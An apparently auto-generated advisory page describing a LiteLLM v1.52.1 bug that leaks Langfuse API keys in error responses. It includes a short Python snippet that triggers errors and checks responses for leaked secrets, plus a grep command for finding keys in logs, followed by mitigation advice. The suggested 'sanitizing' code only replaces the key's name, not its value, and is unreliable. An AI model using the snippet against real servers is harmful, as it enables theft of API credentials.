How the CVE Works:
In berriai/litellm version v1.52.1, a vulnerability exists in the `proxy_server.py` file. When an error occurs during the parsing of team settings, the system inadvertently leaks sensitive Langfuse API keys, including `langfuse_secret` and langfuse_public_key. These keys are exposed in error logs or responses, allowing attackers to gain unauthorized access to the Langfuse project. This project stores all requests, making the leaked keys highly critical. The issue arises due to improper error handling, which fails to sanitize or redact sensitive information before logging or displaying it.
DailyCVE Form:
Platform: LiteLLM
Version: v1.52.1
Vulnerability: API Key Leakage
Severity: High
Date: Mar 20, 2025
What Undercode Say:
Exploitation:
1. Exploit Code:
import requests
target_url = "http://target-server/proxy_endpoint"
payload = {"malformed_input": "trigger_error"}
response = requests.post(target_url, json=payload)
if "langfuse_secret" in response.text:
print("API Key Leaked:", response.text)
2. Log Analysis:
Attackers can monitor error logs or responses for exposed keys using tools like grep:
grep -i "langfuse_secret" /var/log/litellm/error.log
3. Automated Scanning:
Use tools like `Burp Suite` or `OWASP ZAP` to fuzz endpoints and trigger errors for key leakage.
Protection:
1. Patch Application:
Upgrade to the latest version of LiteLLM where the issue is fixed:
pip install --upgrade litellm
2. Error Handling:
Modify `proxy_server.py` to sanitize sensitive data before logging:
try:
Parsing logic
except Exception as e:
sanitized_error = str(e).replace("langfuse_secret", "[bash]")
log_error(sanitized_error)
3. Environment Variables:
Store API keys in environment variables instead of hardcoding:
import os
langfuse_secret = os.getenv("LANGFUSE_SECRET")
4. Monitoring:
Implement monitoring for unusual access patterns using tools like `Splunk` or ELK Stack.
5. Access Control:
Restrict access to error logs and sensitive endpoints using firewalls and IAM policies.
6. Code Review:
Regularly review code for improper error handling and sensitive data exposure.
7. Security Tools:
Use static analysis tools like `Bandit` or `Semgrep` to detect vulnerabilities in Python code:
bandit -r /path/to/litellm
8. Incident Response:
Rotate exposed API keys immediately and audit logs for unauthorized access.
By following these steps, organizations can mitigate the risk of API key leakage and protect their Langfuse projects from unauthorized access.
References:
Reported By: https://github.com/advisories/GHSA-879v-fggm-vxw2
Extra Source Hub:
Undercode
